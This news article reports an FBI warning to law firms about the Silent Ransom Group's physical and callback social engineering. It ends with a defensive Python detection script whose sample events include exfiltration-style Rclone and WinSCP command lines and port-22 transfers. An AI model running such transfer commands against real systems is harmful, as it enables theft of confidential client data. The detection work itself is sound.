
FBI Warns Law Firms of ‘Physical’ Social Engineering as Silent Ransom Group Tactics Evolve

Saran K | May 27, 2026 | 4 min read


    The Trojan Horse in the Lobby

    Cybersecurity is often framed as a battle of firewalls and encryption, but the FBI is warning U.S. law firms that the most dangerous vulnerability might actually be their front door. In a recent advisory, federal investigators detailed the evolving tactics of the Silent Ransom Group (SRG), an extortion crew that has shifted from purely digital incursions to physical social engineering.

    The group, which has been active since 2022, is increasingly employing a high-risk strategy: physically walking into law offices and posing as internal IT support. When remote phishing attempts fail to yield access, SRG operatives are reportedly entering office buildings, leveraging the inherent trust employees place in technical staff to gain direct access to hardware.

    According to the FBI, these attackers often target employees who have already been contacted via phishing emails or SMS. By the time the operative arrives in person, the victim is already primed to expect a “fix” for a technical issue. The attackers then claim they need to “image the device” or “create a backup file” to assess the damage of a previous phishing attempt—a classic bait-and-switch that allows them to plug a thumb drive directly into a workstation and exfiltrate sensitive client data.

    Moving Beyond the Encryption Trap

    Unlike traditional ransomware gangs that lock systems behind a wall of encryption, SRG operates as a “hack-and-leak” entity. They don’t care about crashing the network; they care about the data. By stealing highly sensitive legal documents and threatening to release them on a dedicated data leak site (DLS), they create immense leverage for extortion.

    The FBI notes that the legal sector has become a primary target since 2023. The motive is clear: law firms hold an incredible density of high-value intellectual property, trade secrets, and privileged communication. The risk of public exposure for a law firm’s clients is far more damaging than a few days of downtime, making these firms lucrative targets for pure data extortion.

    One high-profile example of this pressure is the law firm Jones Day, which was recently listed on SRG’s leak site. While the firm confirmed a “cyber phishing incident” in April, they stopped short of naming SRG as the perpetrator. This pattern of targeting elite firms—including those representing top political figures—suggests that SRG is specifically hunting for data with maximum political or financial volatility.

    The ‘Callback’ Pipeline

    While physical intrusions make the headlines, the bulk of SRG’s operation remains rooted in sophisticated callback phishing. The process typically begins with a fraudulent SMS or email claiming a small, unauthorized subscription has been charged to the target’s account. To “cancel” the subscription, the victim is prompted to call a provided number.

    Once on the line, the SRG operative maintains the facade of a helpful IT representative, eventually convincing the employee to grant remote desktop access. With that access, the group uses tools like WinSCP or modified versions of Rclone to siphon data. In some cases, they even use the firm’s own internal collaboration tools, such as Microsoft OneDrive or Google Drive, to move stolen documents out of the network undetected.

    Hardening the Perimeter

    The FBI’s latest guidance suggests that traditional software updates are not enough to stop a physical intruder. The agency is urging firms to implement strict hardware controls, specifically disabling the use of external USB drives on company-issued devices that house confidential information.

    Beyond the hardware, the FBI recommends blocking port 22 to prevent unauthorized encrypted remote access and deploying phishing-resistant multi-factor authentication (MFA) across all services. Perhaps most importantly, the advisory emphasizes the need for “human firewalls”—training staff to verify the identity of any individual claiming to be IT support, regardless of whether they are on a phone call or standing in the office.
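A detection-side sketch to accompany the guidance above, added here as an example and not taken from the FBI advisory: it triages endpoint events for the transfer tools named earlier (WinSCP and Rclone, including renamed Rclone binaries recognised by the shape of their command line) and for outbound connections on port 22. The event format, host names, addresses and the treatment of RFC 1918 ranges as internal are assumptions, and the sample events are constructed.

```python
import ipaddress
import ntpath
import re

# Assumption: RFC 1918 ranges count as internal; adjust to the firm's addressing.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
TOOL_NAMES = {"winscp.exe", "winscp.com", "rclone.exe"}
RCLONE_VERBS = {"copy", "sync", "move"}
RCLONE_FLAGS = {"--config", "--transfers", "--no-check-certificate"}
# rclone "remote:path" argument; requiring 2+ characters before the colon skips drive letters.
REMOTE_ARG = re.compile(r"^[\w-]{2,}:(?!//)")

# Constructed sample events in a simplified, hypothetical format (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS-014", "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "cmdline": "WinSCP.exe sftp://user@203.0.113.10/"},
    {"type": "process", "host": "WS-014", "image": r"C:\Users\Public\svchost32.exe",
     "cmdline": r"svchost32.exe copy D:\Clients remote:bucket --transfers 16 --config C:\Users\Public\r.conf"},
    {"type": "process", "host": "WS-030", "image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r"robocopy C:\a D:\b /copy:DAT"},
    {"type": "network", "host": "WS-022", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "dest_ip": "198.51.100.7", "dest_port": 22},
    {"type": "network", "host": "WS-022", "image": "ssh.exe", "dest_ip": "10.0.5.20", "dest_port": 22},
    {"type": "network", "host": "WS-022", "image": "chrome.exe", "dest_ip": "198.51.100.8", "dest_port": 443},
]

def classify(event):
    """Return the finding labels for one event (empty list if nothing matched)."""
    findings = []
    name = ntpath.basename(event.get("image", "")).lower()
    if event["type"] == "process":
        tokens = set(event.get("cmdline", "").split()[1:])  # naive split, ignores quoting
        if name in TOOL_NAMES:
            findings.append("transfer-tool-by-name")
        # A renamed binary still needs an rclone verb plus a remote argument or rclone flag.
        rclone_like = (RCLONE_VERBS & tokens) and (
            any(REMOTE_ARG.match(t) for t in tokens) or (RCLONE_FLAGS & tokens))
        if rclone_like and name != "rclone.exe":
            findings.append("rclone-like-cmdline-renamed-binary")
    elif event["type"] == "network" and event.get("dest_port") == 22:
        dest = ipaddress.ip_address(event["dest_ip"])
        if not any(dest in net for net in INTERNAL):
            findings.append("outbound-ssh-to-external")
    return findings

def triage(events):
    """Flatten findings into (host, label) pairs for review."""
    return [(e["host"], label) for e in events for label in classify(e)]

if __name__ == "__main__":
    for host, label in triage(SAMPLE_EVENTS):
        print(host, label)
```

Name-based matching alone misses a modified or renamed Rclone, which is why the command-line rule exists; where port 22 is blocked at the egress firewall, the network rule instead serves as a check that the block is actually in effect.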

    Federal investigators are currently seeking assistance from the public and private sector, requesting phone transcripts, cryptocurrency wallet addresses, and any identifying information regarding individuals seen in office buildings during these suspected incursions.
